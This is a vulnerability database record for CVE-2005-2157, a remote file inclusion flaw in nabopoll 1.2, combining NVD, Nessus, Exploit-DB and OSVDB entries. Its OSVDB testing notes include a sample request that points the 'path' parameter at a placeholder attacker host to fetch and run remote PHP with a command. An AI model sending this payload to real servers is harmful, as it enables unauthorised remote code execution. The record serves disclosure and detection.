ID: CVE-2005-2157
Type: cve
Reporter: NVD
Modified: 2011-03-07T21:23:30
Description
PHP remote file inclusion vulnerability in survey.inc.php for nabopoll 1.2 allows remote attackers to execute arbitrary PHP code via the path parameter.
{"result": {"nessus": [{"id": "NABOPOLL_PATH_REMOTE_INCLUDES.NASL", "type": "nessus", "title": "Nabopoll survey.inc.php path Parameter Remote File Inclusion", "description": "The remote host is running nabopoll, a web-based voting / survey software for PHP and MySQL. \n\nThe installed version of nabopoll allows remote attackers to control the 'path' parameter used when including PHP code in the script 'survey.inc.php'. By leveraging this flaw, an attacker is able to view arbitrary files on the remote host and even execute arbitrary PHP code, possibly taken from third-party hosts.", "published": "2005-07-05T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=18618", "cvelist": ["CVE-2005-2157"], "lastseen": "2016-09-26T17:25:11"}], "exploitdb": [{"id": "EDB-ID:3315", "type": "exploitdb", "title": "nabopoll 1.2 survey.inc.php path Remote File Include Vulnerability", "description": "nabopoll 1.2 (survey.inc.php path) Remote File Include Vulnerability. CVE-2005-2157. Webapps exploit for php platform", "published": "2007-02-15T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/3315/", "cvelist": ["CVE-2005-2157"], "lastseen": "2016-01-31T18:11:48"}], "osvdb": [{"id": "OSVDB:17706", "type": "osvdb", "title": "Nabopoll survey.inc.php path Variable Remote File Inclusion", "description": "## Vulnerability Description\nNabopoll contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to survey.inc.php not properly sanitizing user input supplied to the path variable. 
This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nNabopoll contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to survey.inc.php not properly sanitizing user input supplied to the path variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[victim]/nabopoll/survey.inc.php?path=3Dhttp://[attacker]/test/xpl.php?cmd=3Did\n## References:\nVendor URL: http://www.nabocorp.com/nabopoll/\nSecurity Tracker: 1014355\n[Secunia Advisory ID:15910](https://secuniaresearch.flexerasoftware.com/advisories/15910/)\n[CVE-2005-2157](https://vulners.com/cve/CVE-2005-2157)\n", "published": "2005-07-01T10:16:31", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://vulners.com/osvdb/OSVDB:17706", "cvelist": ["CVE-2005-2157"], "lastseen": "2017-04-28T13:20:14"}]}}